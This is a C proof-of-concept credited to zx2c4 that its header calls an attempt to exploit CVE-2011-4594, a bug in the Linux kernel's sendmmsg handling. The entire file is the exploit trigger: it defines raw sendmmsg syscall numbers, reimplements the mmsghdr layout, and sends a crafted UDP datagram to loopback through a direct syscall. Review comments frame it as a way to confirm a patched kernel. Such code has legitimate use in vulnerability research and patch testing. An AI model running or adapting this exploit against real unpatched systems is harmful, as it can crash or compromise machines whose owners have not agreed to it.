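/*
 * Socket Splickt
 * by zx2c4
 *
 * This is an attempt to exploit CVE-2011-4594.
 *
 * It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c.
 *
 * Everything the program does is visible in this file: it builds one UDP
 * datagram of ten zero bytes addressed to 127.0.0.1:10000 and hands it to
 * the kernel through a direct sendmmsg(2) syscall, using a locally defined
 * mmsghdr layout so it also builds against a libc that predates the
 * sendmmsg wrapper.  Whatever misbehaves does so inside the kernel's
 * sendmmsg path; nothing here reads a reply.  On a kernel that carries the
 * commit above the call is an ordinary send and the program exits 0, which
 * is the quickest way to confirm a fixed kernel.
 *
 * NOTE(review): the header names were lost when this listing was
 * extracted (fourteen bare "#include" tokens remained).  The include list
 * below is reconstructed from the identifiers the code uses and may not be
 * the author's exact set.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * sendmmsg syscall numbers for toolchains whose kernel headers predate
 * the syscall.  Only the three architectures the author cared about are
 * covered; anything else is a hard build error rather than a silent wrong
 * syscall.
 */
#ifndef __NR_sendmmsg
#if defined(__PPC__)
#define __NR_sendmmsg 349
#elif defined(__x86_64__)
#define __NR_sendmmsg 307
#elif defined(__i386__)
#define __NR_sendmmsg 345
#else
#error __NR_sendmmsg not defined
#endif
#endif

/*
 * Local stand-in for struct mmsghdr: one msghdr followed by the per-message
 * byte count the kernel fills in.  The pointer goes straight to the syscall,
 * so this layout must match the kernel's definition exactly.
 */
struct reimp_mmsghdr {
	struct msghdr msg_hdr;
	unsigned int msg_len;
};

/*
 * Raw sendmmsg(2) wrapper.
 *
 * @fd:    socket to send on
 * @mmsg:  array of @vlen messages
 * @vlen:  number of messages in @mmsg
 * @flags: send flags, passed through unchanged
 *
 * Returns the number of messages the kernel accepted, or -1 with errno set.
 * sendmmsg takes exactly these four arguments; the extra trailing NULL the
 * original passed was ignored by the kernel and has been dropped.
 */
static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg,
				 unsigned int vlen, unsigned int flags)
{
	return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags);
}

/*
 * Send a single zero-filled datagram to loopback port 10000 via sendmmsg.
 *
 * Exit status: 0 if the kernel accepted the message, 1 if socket() or the
 * syscall failed (the failing call is reported through perror).  argc and
 * argv are unused.
 */
int main(int argc, char *argv[])
{
	/* Payload: ten zero bytes.  Contents are irrelevant to the send. */
	char buf[10] = { 0 };
	struct iovec iov[1] = {
		{ .iov_base = buf, .iov_len = sizeof buf },
	};
	/* Destination is the local host, so nothing leaves the machine. */
	struct sockaddr_in addr = {
		.sin_family = AF_INET,
		.sin_addr.s_addr = htonl(INADDR_LOOPBACK),
		.sin_port = htons(10000),
	};
	/*
	 * Designated initializers zero every field not named, which is what
	 * the original memset() calls achieved.  msg_len is left for the
	 * kernel to fill in.
	 */
	struct reimp_mmsghdr datagram = {
		.msg_hdr = {
			.msg_name = &addr,
			.msg_namelen = sizeof addr,
			.msg_iov = iov,
			.msg_iovlen = 1,
		},
	};
	int fd;

	(void)argc;
	(void)argv;

	/*
	 * The original never checked socket(); a failure there surfaced
	 * later as a misleading EBADF from the syscall.
	 */
	fd = socket(AF_INET, SOCK_DGRAM, 0);
	if (fd < 0) {
		perror("socket");
		return 1;
	}

	if (reimp_sendmmsg(fd, &datagram, 1, 0) < 0) {
		perror("reimp_sendmmsg");
		close(fd);
		return 1;
	}

	close(fd);
	return 0;
}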